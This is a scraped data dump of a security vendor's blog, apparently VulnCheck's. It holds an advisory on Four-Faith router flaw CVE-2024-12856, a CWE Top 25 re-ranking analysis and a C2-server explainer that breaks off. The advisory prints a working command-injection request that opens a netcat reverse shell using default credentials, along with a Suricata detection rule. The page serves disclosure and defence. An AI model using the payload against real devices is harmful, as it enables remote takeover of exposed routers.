Access","https:\u002F\u002Fgbhackers.com\u002Ffour-faith-industrial-routers-vulnerability\u002F",{"title":58367,"source":32222,"link":58390,"date":58369},"https:\u002F\u002Fwww.govinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58392,"source":12145,"link":58393,"date":58369},"Critical Flaw Exposes Four-Faith Routers to Remote Exploitation","https:\u002F\u002Fhackread.com\u002Fcritical-flaw-expose-four-faith-routers-remote-exploitation\u002F",{"title":58367,"source":32225,"link":58395,"date":58369},"https:\u002F\u002Fwww.healthcareinfosecurity.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32228,"link":58397,"date":58369},"https:\u002F\u002Fwww.inforisktoday.com\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58367,"source":32231,"link":58399,"date":58369},"https:\u002F\u002Fwww.paymentsecurity.io\u002Ffour-faith-routers-exploited-using-new-flaw-a-27179",{"title":58401,"source":11233,"link":58402,"date":58369},"Thousands of vulnerable Four-Faith routers threatened by ongoing intrusions","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fthousands-of-vulnerable-four-faith-routers-threatened-by-ongoing-intrusions",{"title":58404,"source":14390,"link":58405,"date":58369},"Threat actors attempt to exploit a flaw in Four-Faith routers","https:\u002F\u002Fsecurityaffairs.com\u002F172450\u002Fhacking\u002Ffour-faith-routers-flaw-exploited.html",{"title":58407,"source":14378,"link":58408,"date":58369},"Four-Faith Industrial Router Vulnerability Exploited in Attacks","https:\u002F\u002Fwww.securityweek.com\u002Ffour-faith-industrial-router-vulnerability-exploited-in-attacks\u002F",{"title":58410,"source":58411,"link":58412,"date":58369},"15,000+ Four-Faith Routers Vulnerable to Exploits Mostly Due to Default Credentials","TechNadu","https:\u002F\u002Fwww.technadu.com\u002F15000-four-faith-routers-vulnerable-to-exploits-mostly-due-to-default-credentials\u002F563364\u002F",{"title":58414,"source":12149,"link":58415,"date":58416},"New post-authentication vulnerability discovered in Four-Faith industrial routers","https:\u002F\u002Findustrialcyber.co\u002Findustrial-cyber-attacks\u002Fnew-post-authentication-vulnerability-discovered-in-four-faith-industrial-routers\u002F","2025-01-03",{"title":58418,"source":14373,"link":58419,"date":58420},"New Mirai botnet targets industrial routers with zero-day exploits","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-mirai-botnet-targets-industrial-routers-with-zero-day-exploits\u002F","2025-01-07",{"title":58422,"source":14386,"link":58423,"date":58424},"Mirai Botnet Exploiting Routers 0-Day Vulnerabilities to Launch DDoS Attack","https:\u002F\u002Fcybersecuritynews.com\u002Fmirai-botnet-exploiting-routers-0-day-vulnerabilities\u002F","2025-01-08",{"title":58426,"source":14382,"link":58427,"date":58424},"Mirai Botnet Variants Exploits Four-Faith Router Vulnerability for DDoS Attacks","https:\u002F\u002Fthehackernews.com\u002F2025\u002F01\u002Fmirai-botnet-variant-exploits-four.html",{"title":58429,"source":12145,"link":58430,"date":58424},"Critical Flaw in Moxa Routers Allow Root Privilege Escalation","https:\u002F\u002Fhackread.com\u002Fmoxa-reports-critical-industrial-router-vulnerabilities\u002F",{"title":58432,"source":58433,"link":58434,"date":58435},"New Mirai botnet targets industrial routers","CSO Magazine","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3716843\u002Fnew-mirai-botnet-targets-industrial-routers.html","2025-01-09",{"title":58437,"source":12149,"link":58438,"date":58439},"Singapore’s CSA issues urgent advisory on Mirai botnet threat to industrial routers, smart home devices","https:\u002F\u002Findustrialcyber.co\u002Fcontrol-device-security\u002Fsingapores-csa-issues-urgent-advisory-on-mirai-botnet-threat-to-industrial-routers-smart-home-devices\u002F","2025-01-13",[58441],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":58443,"toc":58570},[58444,58451,58471,58477,58482,58488,58509,58523,58529,58535,58543,58545,58559],[18,58445,58446,58447,59],{},"VulnCheck observed a new post-authentication vulnerability affecting Four-Faith industrial routers being exploited in the wild. The attacker leveraged the router’s default credentials, effectively resulting in unauthenticated remote command injection. VulnCheck has assigned this issue ",[47,58448,24226],{"href":58449,"rel":58450},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2024-12856",[51],[18,58452,58453,58454,58457,58458,58462,58463,58466,58467,58470],{},"The attack can be conducted against, at least, the Four-Faith F3x24 and F3x36 over HTTP using the ",[886,58455,58456],{},"\u002Fapply.cgi"," endpoint. ",[47,58459,55030],{"href":58460,"rel":58461},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=same_service%28services.http.response.headers%3A+%28key%3A+%60Server%60+and+value.headers%3A+%60httpd_four-faith%60%29+and+services.http.response.protocol%3D%22HTTP%2F1.0%22+and+services.http.response.status_reason%3D%22Ok%22%29+or+services.http.response.favicons.shodan_hash%3D%22375199015%22",[51]," finds approximately 15,000 internet-facing devices. The systems are vulnerable to OS command injection in the ",[886,58464,58465],{},"adj_time_year"," parameter when modifying the device’s system time via ",[886,58468,58469],{},"submit_type=adjust_sys_time",". The following POST request demonstrates exploitation for a reverse shell.",[1354,58472,58475],{"className":58473,"code":58474,"language":1359,"meta":219},[1357],"POST \u002Fapply.cgi HTTP\u002F1.1\nHost: 192.168.1.1:90\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F131.0.0.0 Safari\u002F537.36\nContent-Length: 296\nAuthorization: Basic YWRtaW46YWRtaW4=\nContent-Type: application\u002Fx-www-form-urlencoded\nAccept-Encoding: gzip\nadj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time\n",[886,58476,58474],{"__ignoreMap":219},[18,58478,58479,58480,4606],{},"On the device, the result of the injection can be observed using ",[886,58481,55448],{},[1354,58483,58486],{"className":58484,"code":58485,"language":1359,"meta":219},[1357],"20938 admin 1640 S sh -c rtc_tm ss $(cd \u002Ftmp\u002F; mknod WaO p;cat WaO|\u002Fbin\n20940 admin 1640 S sh -c rtc_tm ss $(cd \u002Ftmp\u002F; mknod WaO p;cat WaO|\u002Fbin\n20942 admin 1636 S cat WaO\n20943 admin 1636 S \u002Fbin\u002Fsh -i\n20945 admin 1636 S nc 192.168.1.206 1270\n",[886,58487,58485],{"__ignoreMap":219},[18,58489,58490,58491,58496,58497,58500,58501,58504,58505,58508],{},"For those that have an encyclopedic memory for exploits, this vulnerability should not be confused with ",[47,58492,58495],{"href":58493,"rel":58494},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-kev?cve=CVE-2019-12168",[51],"CVE-2019-12168",". While both flow through the ",[886,58498,58499],{},"apply.cgi"," endpoint, they attack different underlying components (CVE-2019-12168 attacks ",[886,58502,58503],{},"submit_type=start"," and has an OS injection in the ",[886,58506,58507],{},"ping_ip"," parameter).",[18,58510,58511,58512,58517,58518,58522],{},"VulnCheck observed ",[47,58513,58516],{"href":58514,"rel":58515},"https:\u002F\u002Fviz.greynoise.io\u002Fip\u002F178.215.238.91",[51],"178.215.238[.]91"," attempting to exploit this vulnerability. Additionally, we note that this November 2024 ",[47,58519,11046],{"href":58520,"rel":58521},"https:\u002F\u002Fducklingstudio.blog.fc2.com\u002Fblog-entry-392.html",[51]," also calls out exploitation of this vulnerability. Their observed User-Agent even matches the User-Agent VulnCheck observed in the wild (although we saw an entirely different payload).",[18,58524,2245,58525,58528],{},[47,58526,2706],{"href":45535,"rel":58527},[51]," team wrote the following Suricata rule to detect CVE-2024-12856 on the wire:",[1354,58530,58533],{"className":58531,"code":58532,"language":1359,"meta":219},[1357],"alert http any any -> any any ( \\\n msg:\"VULNCHECK Four-Faith CVE-2024-12856 Exploit Attempt\"; \\\n flow:to_server; \\\n http.method; content:\"POST\"; \\\n http.uri; content:\"\u002Fapply.cgi\"; startswith; \\\n http.header_names; content:\"Authorization\"; \\\n http.request_body; content:\"change_action=\"; \\\n content:\"adjust_sys_time\"; \\\n pcre:\"\u002Fadj_time_[^=]+=[a-zA-Z0-9]*[^a-zA-Z0-9=]\u002F\"; \\\n classtype:web-application-attack; \\\n reference:cve,CVE-2024-12856; \\\n sid:12700438; rev:1;)\n",[886,58534,58532],{"__ignoreMap":219},[18,58536,58537,58538,58542],{},"Finally, pursuant to our ",[47,58539,58541],{"href":58200,"rel":58540},[51],"vulnerability disclosure policy"," for vulnerabilities exploited in the wild, we notified Four-Faith and our customers about this issue on December 20, 2024. Questions about patches, affected models, and affected firmware versions should be directed at Four-Faith.",[61,58544,202],{"id":201},[18,58546,53821,58547,1246,58550,1246,58553,53839,58556],{},[47,58548,40447],{"href":53829,"rel":58549},[51],[47,58551,36637],{"href":53833,"rel":58552},[51],[47,58554,35931],{"href":53837,"rel":58555},[51],[47,58557,22211],{"href":53842,"rel":58558},[51],[18,58560,53846,58561,53850,58564,982,58567,1260],{},[47,58562,1233],{"href":2871,"rel":58563},[51],[47,58565,1245],{"href":45535,"rel":58566},[51],[47,58568,216],{"href":214,"rel":58569},[51],{"title":219,"searchDepth":220,"depth":220,"links":58571},[58572],{"id":201,"depth":220,"text":202},"2024-12-27","VulnCheck discovers that a new vulnerability affecting Four-Faith industrial routers has been exploited in the wild",{"slug":58576},"four-faith-cve-2024-12856","\u002Fblog\u002Ffour-faith-cve-2024-12856",{"title":53826,"description":58574},"blog\u002Ffour-faith-cve-2024-12856",[2941,242,1281,23275,1279],"zUxhuJKqn_tu16p50T3UZgJ0kR0kO9dHrDGqbUQpqck",{"id":58583,"title":58584,"articles":7,"authors":58585,"body":58587,"date":58899,"description":58900,"extension":234,"image":7,"link":7,"meta":58901,"navigation":237,"path":58903,"seo":58904,"series":7,"stem":58905,"subtype":7,"tags":58906,"__hash__":58908},"blog\u002Fblog\u002Fcwe-top-25-2024.md","Are the Top 25 CWEs Truly the Most Dangerous Software Weaknesses in 2024?",[58586],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":58588,"toc":58886},[58589,58591,58614,58620,58629,58636,58639,58643,58647,58650,58654,58657,58661,58664,58668,58671,58676,58680,58684,58690,58696,58702,58706,58712,58718,58724,58730,58734,58740,58744,58747,58752,58756,58759,58859,58862,58865,58870,58872,58875,58877,58879,58881],[1920,58590,20],{"id":3520},[22,58592,58593,58596,58599,58602,58605,58608,58611],{},[25,58594,58595],{},"In November, Mitre released the 2024 CWE Top 25 Most Dangerous Software Weaknesses list.",[25,58597,58598],{},"Today, VulnCheck issued a report re-evaluating the rankings with a threat-centric approach.",[25,58600,58601],{},"For each CWE, VulnCheck calculated the total number of CVEs, the count of known exploited vulnerabilities (KEVs), and the KEV-to-CVE ratio for the same period covered in Mitre's research.",[25,58603,58604],{},"Findings suggest that while all vulnerabilities can pose risks, Mitre’s list heavily prioritizes vulnerability counts without considering real-world exploitation context.",[25,58606,58607],{},"VulnCheck research repeatedly shows that vulnerabilities known to be exploited in the wild should be treated with urgency and remediated as soon as possible.",[25,58609,58610],{},"The report questions whether CWEs like CWE-352 - Cross-Site Request Forgery and CWE-476 - Null Pointer Dereference even deserve a spot on the list.",[25,58612,58613],{},"VulnCheck also highlights a handful of CWEs that are worth mentioning but not on Mitre’s top 25 list, including CWE-284: Improper Access Control, CWE-843:Type Confusion, and more",[18,58615,58616],{},[68,58617],{":width":10862,"alt":58618,"src":58619},"Vulnerabilities, Exploitation, Exploits","\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-top-25-2024.png",[18,58621,58622,58623,58628],{},"In November, Mitre released its annual research on the ",[47,58624,58627],{"href":58625,"rel":58626},"https:\u002F\u002Fcwe.mitre.org\u002Ftop25\u002Farchive\u002F2024\u002F2024_cwe_top25.html",[51],"Top 25 most dangerous software weaknesses",". This research calculates a \"danger score\" based on a combination of frequency and severity. We thought it would be interesting to re-evaluate the rankings with a threat-centric approach using broader exploitation evidence to see if we could help answer the question, “Are the Top 25 CWEs Truly the Most Dangerous Software Weaknesses in 2024?.\"",[18,58630,58631,58632,58635],{},"To do this, we analyzed CVEs from the same time period and mapped known exploitations to the CVEs associated with each CWE using ",[47,58633,1233],{"href":2871,"rel":58634},[51],", which is a free community resource. For each CWE, we calculated the total number of CVEs, the count of known exploited vulnerabilities (KEVs), and the KEV-to-CVE ratio for the same period covered in Mitre's research (June 1, 2023 – June 1, 2024).",[18,58637,58638],{},"Using these metrics, we created a chart to visualize the 2024 Top 25 Most Dangerous CWEs. To enhance clarity, we applied color gradients to represent the density of each metric, offering a more intuitive view into how these factors might impact the rankings.",[1920,58640,58642],{"id":58641},"exploring-the-cwe-top-25-most-dangerous-software-weaknesses","Exploring The CWE Top 25 Most Dangerous Software Weaknesses",[61,58644,58646],{"id":58645},"mapping-to-cve-counts","Mapping to CVE Counts",[18,58648,58649],{},"We first examined the CVE counts, which appear to closely align with the CWE rankings. This correlation is unsurprising since the count or frequency of CVEs is a core component of the Danger Score calculation. Incorporating severity, as measured by CVSS, has only a marginal impact on the rankings.",[61,58651,58653],{"id":58652},"mapping-to-known-exploitation-vulnerabilities","Mapping to Known Exploitation Vulnerabilities",[18,58655,58656],{},"Next, we explored how known exploitation might influence the Top 25 CWE rankings. Using VulnCheck KEV, we calculated the number of vulnerabilities that have evidence of exploitation to understand how CWEs would rank based solely on the volume of Known Exploited Vulnerabilities (KEVs) published during the same time period using VulnCheck KEV.",[61,58658,58660],{"id":58659},"kev-to-cve-ratio","KEV to CVE Ratio",[18,58662,58663],{},"We then calculated the KEV to CVE ratio for each CWE to assess its potential impact on rankings. This calculation provided insights into how weighting CWEs with a threat component could significantly reorder the Top 25 CWEs. We considered using a weighted calculation but decided to keep it simple with the KEV to CVE ratio for this analysis.",[1920,58665,58667],{"id":58666},"a-look-into-the-top-25-cwe-outliers","A look into the Top 25 CWE Outliers",[18,58669,58670],{},"To better analyze the outliers among the Top 25 CWEs, we used a bubble chart for CWE’s with 100 or more CVEs and 1 or more KEVs associated with them. This visualization maps the volume of vulnerabilities on the x-axis, the KEV-to-CVE ratio on the y-axis, and represents the number of KEVs with bubble sizes.",[18,58672,58673],{},[68,58674],{":width":10862,"alt":58618,"src":58675},"\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-bubble-chart.png",[61,58677,58679],{"id":58678},"cwe-outlier-observations","CWE Outlier observations",[993,58681,58683],{"id":58682},"cwes-w-higher-kev-to-cve-ratio-and-lower-cve-count","CWEs w\u002F Higher KEV-to-CVE Ratio and Lower CVE count",[18,58685,58686,58689],{},[295,58687,58688],{},"CWE-798 - Hard Coded Credentials","\nSix KEVs associated with Hitron DVR systems were published with the same description for different products. If these were treated as a single CVE, the KEV-to-CVE ratio would drop to 2.73%.",[18,58691,58692,58695],{},[295,58693,58694],{},"CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')","\nThis CWE shows a high prevalence of KEVs tied to a wide range of noteworthy products, including network devices and ICS equipment. Examples include Ivanti Sentry, Ivanti Connect Secure, VMware Aria, Totolink, Tenda, Palo Alto PanOS, Nextgen MirthConnect, Honeywell firmware, and D-Link, among others.",[18,58697,58698,58701],{},[295,58699,58700],{},"CWE-94 - Improper Control of Generation of Code ('Code Injection')","\nThere is a notable prevalence of KEVs linked to widely used technology and open-source projects. Examples include Apache OFBiz\u002FRocketMQ, OpenMetadata, CrushFTP, Cisco ASA, Microsoft Windows, Citrix Netscaler, Ivanti Sentry, and others.",[993,58703,58705],{"id":58704},"cwes-w-lower-kev-to-cve-ratio-and-higher-cve-count","CWEs w\u002F Lower KEV-to-CVE Ratio and Higher CVE count",[18,58707,58708,58711],{},[295,58709,58710],{},"CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","\nNearly half of the KEVs identified are associated with WordPress plugins. Other notable technologies with known exploitation outside the WordPress ecosystem include Citrix Netscaler, Roundcube (email), and Zimbra (email). We noticed that 37% of all CVEs associated with CWE-79 come from WordPress CNAs, making the WordPress plugin ecosystem a major factor in elevating CWE-79 to the top of the CWE’s most dangerous list.",[18,58713,58714,58717],{},[295,58715,58716],{},"CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","\nSeveral prevalent technologies, such as Progress MOVEit, SonicWall Analytics, PostgreSQL, Ivanti EMM, Fortinet FortiClient, and F5 Big-IP, have KEVs tied to this CWE, suggesting it’s deserving of a top spot on the list.",[18,58719,58720,58723],{},[295,58721,58722],{},"CWE-787 - Out-of-bounds Write","\nBased on the technologies impacted and the volume of KEVs, this CWE stands out as one of the more dangerous weaknesses, suggesting it deserves its high ranking. Affected technologies include Google Chrome\u002FEdge, VMware vCenter, VMware ESXi, Microsoft Windows, GNU glibc, Fortinet FortiOS, Rockwell Automation devices, Ivanti Connect Secure, Cisco IOS\u002FXE, Adobe Acrobat, and others.",[18,58725,58726,58729],{},[295,58727,58728],{},"CWE-352 - Cross-Site Request Forgery (CSRF)","\nDespite ranking 4th on the list, only a single KEV was identified for this CWE, which is tied to a WordPress plugin. This raises questions about whether CSRF deserves to be in the top 25, let alone being placed so high on the list.",[993,58731,58733],{"id":58732},"cwes-with-no-exploitation-evidence-during-this-time-period","CWEs with no Exploitation Evidence During this Time Period",[18,58735,58736,58739],{},[295,58737,58738],{},"CWE-476 - Null Pointer Dereference","\nWe didn’t see any evidence during this time period of CVEs with this CWE being exploited. The most recent known exploited vulnerability we could find with CWE-476 was published in 2019 and is CVE-2019-10097.",[1920,58741,58743],{"id":58742},"exploring-cwes-by-vendors-with-known-exploited-vulnerabilities","Exploring CWEs by Vendors with Known Exploited Vulnerabilities",[18,58745,58746],{},"We assembled this treemap of CWEs from the top 25 list that includes vendors. Looking at Vendors can help us better understand what vulnerabilities being exploited might be in more broadly adopted technology. We also colorized the treemap based on the KEV to CVE ratio from the research above.",[18,58748,58749],{},[68,58750],{":width":10862,"alt":58618,"src":58751},"\u002Fblog\u002Fcwe-top-25-2024\u002Fcwe-top-vendors.png",[993,58753,58755],{"id":58754},"other-noteworthy-cwes-not-on-the-cwe-top-25-list","Other Noteworthy CWEs Not on the CWE Top 25 List",[18,58757,58758],{},"There are a handful of CWEs that are worth mentioning that did not make the top 25 most dangerous list…",[307,58760,58761,58777],{},[310,58762,58763],{},[313,58764,58765,58767,58769,58771,58774],{},[316,58766,43427],{},[316,58768,10625],{},[316,58770,33855],{},[316,58772,58773],{},"KEVs",[316,58775,58776],{},"Notable Vendor(s) \u002F Product(s)",[336,58778,58779,58795,58811,58827,58843],{},[313,58780,58781,58784,58787,58790,58792],{},[341,58782,58783],{},"CWE-284",[341,58785,58786],{},"Improper Access Control",[341,58788,58789],{},"541",[341,58791,37766],{},[341,58793,58794],{},"Adobe Cold Fusion, Linksys RE7000\u002FE2000, Microsoft Windows, Citrix Content Collaboration, Apache HugeGraph",[313,58796,58797,58800,58803,58806,58808],{},[341,58798,58799],{},"CWE-843",[341,58801,58802],{},"Access of Resource Using Incompatible Type ('Type Confusion')",[341,58804,58805],{},"96",[341,58807,356],{},[341,58809,58810],{},"Google Chrome \u002F Apple OS\u002FIOS",[313,58812,58813,58816,58819,58822,58824],{},[341,58814,58815],{},"CWE-288",[341,58817,58818],{},"Authentication Bypass Using an Alternate Path or Channel",[341,58820,58821],{},"33",[341,58823,401],{},[341,58825,58826],{},"Jetbrains Teamcity, F5 BigIP, ConnectWise Screenconnect, Cisco ASA",[313,58828,58829,58832,58835,58838,58840],{},[341,58830,58831],{},"CWE-122",[341,58833,58834],{},"Heap-based Buffer Overflow",[341,58836,58837],{},"357",[341,58839,401],{},[341,58841,58842],{},"Microsoft Windows, Gnu glibc, Fortinet FortiOS",[313,58844,58845,58848,58851,58854,58856],{},[341,58846,58847],{},"CWE-74",[341,58849,58850],{},"Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')",[341,58852,58853],{},"141",[341,58855,380],{},[341,58857,58858],{},"Terra Master OS, IBM Operational Decision Manager, Atlassian Confluence",[1920,58860,58584],{"id":58861},"are-the-top-25-cwes-truly-the-most-dangerous-software-weaknesses-in-2024",[18,58863,58864],{},"Our research shows that while all vulnerabilities can be dangerous, the 2024 CWE Top 25 Most Dangerous CWEs heavily prioritize vulnerability counts without considering real-world exploitation context. To address this, we developed an alternative CWE ranking based on the number of Known Exploited Vulnerabilities from the same period, offering a practical perspective on the most commonly exploited weaknesses.",[18,58866,58867],{},[68,58868],{":width":10862,"alt":58618,"src":58869},"\u002Fblog\u002Fcwe-top-25-2024\u002Fvulncheck-top-25-2024.png",[61,58871,13048],{"id":13047},[18,58873,58874],{},"We decided to rank CWEs based on number of exploited vulnerabilities per CWE rather than the KEV-to-CVE ratio. This is largely due to the high number of CWEs with low single digit KEVs(1-3) and a small number of CVEs (\u003C100). If we were to rank based on a scoring system in the future, we would definitely want to consider use weighting in the calculation. We encourage others to research as well.",[61,58876,202],{"id":201},[18,58878,205],{},[18,58880,208],{},[18,58882,211,58883,217],{},[47,58884,216],{"href":214,"rel":58885},[51],{"title":219,"searchDepth":220,"depth":220,"links":58887},[58888,58889,58890,58891,58897,58898],{"id":58645,"depth":220,"text":58646},{"id":58652,"depth":220,"text":58653},{"id":58659,"depth":220,"text":58660},{"id":58678,"depth":220,"text":58679,"children":58892},[58893,58894,58895,58896],{"id":58682,"depth":1266,"text":58683},{"id":58704,"depth":1266,"text":58705},{"id":58732,"depth":1266,"text":58733},{"id":58754,"depth":1266,"text":58755},{"id":13047,"depth":220,"text":13048},{"id":201,"depth":220,"text":202},"2024-12-19","In November, Mitre released the 2024 CWE Top 25 Most Dangerous Software Weaknesses list. Today, VulnCheck issued a report re-evaluating the rankings with a threat-centric approach.",{"slug":58902},"cwe-top-25-2024","\u002Fblog\u002Fcwe-top-25-2024",{"title":58584,"description":58900},"blog\u002Fcwe-top-25-2024",[1280,1279,58907],"cwe","1OPvWSy0HFg1MF1RG5FWbqxr30USJZJx0zloRSxK9zk",{"id":58910,"title":58911,"articles":7,"authors":58912,"body":58914,"date":59174,"description":59175,"extension":234,"image":7,"link":7,"meta":59176,"navigation":237,"path":59178,"seo":59179,"series":59180,"stem":59181,"subtype":7,"tags":59182,"__hash__":59183},"blog\u002Fblog\u002Factive-c2-servers.md","Active C2 Servers",[58913],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":58915,"toc":59166},[58916,58918,58926,58929,58932,58936,58939,58942,58950,58958,58966,58969,58973,58976,58983,58986,58989,58997,59000,59003,59009,59012,59015,59019,59022,59030,59038,59046,59054,59058,59066,59076,59085,59093,59102,59110,59114,59117,59125,59133,59141,59149,59153,59156,59164],[18,58917,44358],{},[22,58919,58920,58923],{},[25,58921,58922],{},"What C2 Servers are and how they function",[25,58924,58925],{},"Examples of how C2 servers are vulnerable and exploitable targets and how attackers can exploit them",[18,58927,58928],{},"Command and Control (C2) servers represent the digital nerve centers that attackers use to communicate with their malware, orchestrate attacks, and manage compromised systems.",[18,58930,58931],{},"When a C2 server is \"active,\" it signals that an attack campaign is underway, making it an urgent priority for defenders to identify and neutralize.",[61,58933,58935],{"id":58934},"what-is-a-c2-server","What Is a C2 Server?",[18,58937,58938],{},"At its core, a Command and Control (C2) server is a system or infrastructure that attackers use to maintain control over infected devices (commonly referred to as bots or zombies).",[18,58940,58941],{},"These servers are the backbone of malicious campaigns, serving several purposes:",[18,58943,58944,58947,58949],{},[295,58945,58946],{},"Sending Commands",[1823,58948],{},"\nAttackers use C2 servers to issue instructions to compromised systems.",[18,58951,58952,58955,58957],{},[295,58953,58954],{},"Receiving Data",[1823,58956],{},"\nInfected systems send stolen data, such as login credentials or intellectual property, back to the C2 server.",[18,58959,58960,58963,58965],{},[295,58961,58962],{},"Orchestrating Complex Attacks",[1823,58964],{},"\nC2 servers facilitate coordinated efforts, such as launching Distributed Denial-of-Service (DDoS) attacks or deploying ransomware.",[18,58967,58968],{},"When a C2 server is active, it indicates that the attacker is currently engaged in managing the campaign, posing an immediate threat to any connected systems.",[61,58970,58972],{"id":58971},"why-are-active-c2-servers-so-dangerous","Why Are Active C2 Servers So Dangerous?",[18,58974,58975],{},"Active C2 servers are particularly dangerous because of their role in real-time attack execution. Here’s how attackers use them to carry out key phases of their campaigns:",[18,58977,58978,58980,58982],{},[295,58979,44181],{},[1823,58981],{},"\nData exfiltration refers to the unauthorized transfer of data from a victim’s network to the attacker’s C2 server.",[18,58984,58985],{},"After compromising a system, malware sends sensitive information—such as credentials, financial data, or proprietary files—to the active C2 server. This data is often encrypted to evade detection during transit.",[18,58987,58988],{},"Exfiltration not only compromises sensitive information but can also lead to financial losses, reputational damage, and regulatory penalties for the victim.",[18,58990,58991,58994,58996],{},[295,58992,58993],{},"Ransomware Payload Installation",[1823,58995],{},"\nRansomware is a type of malware that encrypts a victim's data and demands payment for decryption.",[18,58998,58999],{},"Active C2 servers deliver ransomware payloads to infected systems. Once installed, the malware locks files or entire systems, rendering them unusable until a ransom is paid.",[18,59001,59002],{},"The immediacy of ransomware attacks can bring organizations to a standstill, disrupting operations and potentially exposing sensitive data if attackers threaten to leak it.",[18,59004,59005,59008],{},[295,59006,59007],{},"Privilege Escalation","\nPrivilege escalation occurs when attackers gain higher levels of access within a system than initially compromised.",[18,59010,59011],{},"Active C2 servers can send instructions or additional tools to malware that allow it to exploit system vulnerabilities, elevating its permissions to an administrator or root level. This enables attackers to access restricted areas of the network.",[18,59013,59014],{},"With escalated privileges, attackers can move laterally across the network, compromise additional systems, and install persistent backdoors, making the breach significantly harder to contain.",[61,59016,59018],{"id":59017},"why-are-active-c2-servers-highly-exploitable","Why Are Active C2 Servers Highly Exploitable?",[18,59020,59021],{},"Active C2 servers are attractive targets for defenders because they are both a critical dependency for attackers and a potential weak point. Below are a few key examples of why active C2 servers are attractive targets for attackers.",[18,59023,59024,59027,59029],{},[295,59025,59026],{},"Centralized Operations",[1823,59028],{},"\nMany attackers centralize their campaigns through C2 servers. Disabling or taking over these servers disrupts the entire operation.",[18,59031,59032,59035,59037],{},[295,59033,59034],{},"Observable Patterns",[1823,59036],{},"\nMalware communicating with C2 servers often exhibits distinct behaviors, such as consistent beaconing intervals, making the infrastructure easier to detect.",[18,59039,59040,59043,59045],{},[295,59041,59042],{},"Publicly Available Frameworks",[1823,59044],{},"\nAttackers sometimes use off-the-shelf or open-source C2 frameworks, which may contain vulnerabilities that defenders can exploit to shut down operations.",[18,59047,59048,59051,59053],{},[295,59049,59050],{},"Redundant Infrastructure",[1823,59052],{},"\nWhile sophisticated attackers use redundant or multi-layered C2 networks, less advanced campaigns may rely on single points of failure, making them more vulnerable to takedowns.",[61,59055,59057],{"id":59056},"examples-of-active-c2-server-exploits","Examples of Active C2 Server Exploits",[18,59059,59060,59063,59065],{},[295,59061,59062],{},"Emotet Botnet",[1823,59064],{},"\nEmotet, a prolific malware campaign, used active C2 servers to distribute banking trojans, steal credentials, and spread laterally within networks. Its takedown in 2021 involved law enforcement seizing its active C2 infrastructure, effectively dismantling the botnet.",[18,59067,59068,59069,59071,59072,2230],{},"Here’s an all-you-can-eat paper on Emotet from HHS Department. ",[1823,59070],{},"Emotet Malware: The Enduring and Persistent Threat to the Health Sector(",[47,59073,59074],{"href":59074,"rel":59075},"https:\u002F\u002Fwww.hhs.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Femotet-the-enduring-and-persistent-threat-to-the-hph-tlpclear.pdf",[51],[18,59077,59078,59079,59084],{},"Here is ",[47,59080,59083],{"href":59081,"rel":59082},"https:\u002F\u002Fwww.sentinelone.com\u002Fblog\u002Femotet-story-of-disposable-c2-servers\u002F",[51],"a better explanation from SentinelOne"," more to the point on how Emotet malware specifically targets active and ‘disposable’ C2 servers.",[18,59086,59087,59090,59092],{},[295,59088,59089],{},"Conti Ransomware Group",[1823,59091],{},"\nActive C2 servers were integral to the Conti ransomware operation, enabling the group to exfiltrate sensitive data and deploy ransomware to targeted organizations. Defenders neutralized its threat by tracking its C2 communication patterns and blocking them.",[18,59094,59095,59096,59101],{},"Here’s a ",[47,59097,59100],{"href":59098,"rel":59099},"https:\u002F\u002Fheimdalsecurity.com\u002Fblog\u002Fwhat-is-conti-ransomware\u002F",[51],"blog from Heimdal Security"," that provides the full history of the Conti ransomware group with an insightful section on how Tor proxies helped hide exposure to the C2 server so the malware payload was delivered across many attacks over time.",[18,59103,59104,59107,59109],{},[295,59105,59106],{},"APT41's Espionage Campaigns",[1823,59108],{},"\nAdvanced Persistent Threat (APT) groups like APT41 rely on active C2 servers to manage long-term espionage activities. These servers control the exfiltration of sensitive data from targeted organizations and issue commands to maintain persistence.",[61,59111,59113],{"id":59112},"how-defenders-can-respond-to-active-c2-threats","How Defenders Can Respond to Active C2 Threats",[18,59115,59116],{},"To protect against active C2 servers, defenders can take these actions:",[18,59118,59119,59122,59124],{},[295,59120,59121],{},"Threat Intelligence Integration",[1823,59123],{},"\nSubscribe to feeds that provide updated lists of known active C2 IPs, domains, and behavioral patterns. Integrate these feeds with other relevant intelligence based on your organization’s attack profile across vulnerabilities, software and products owned to correlate your exposure status to take action.",[18,59126,59127,59130,59132],{},[295,59128,59129],{},"Traffic Analysis",[1823,59131],{},"\nMonitor for anomalous network traffic, such as unexpected outbound connections to unknown IP addresses or domains.",[18,59134,59135,59138,59140],{},[295,59136,59137],{},"Sinkholing and Takedowns",[1823,59139],{},"\nRedirect traffic away from active C2 servers or collaborate with law enforcement to dismantle 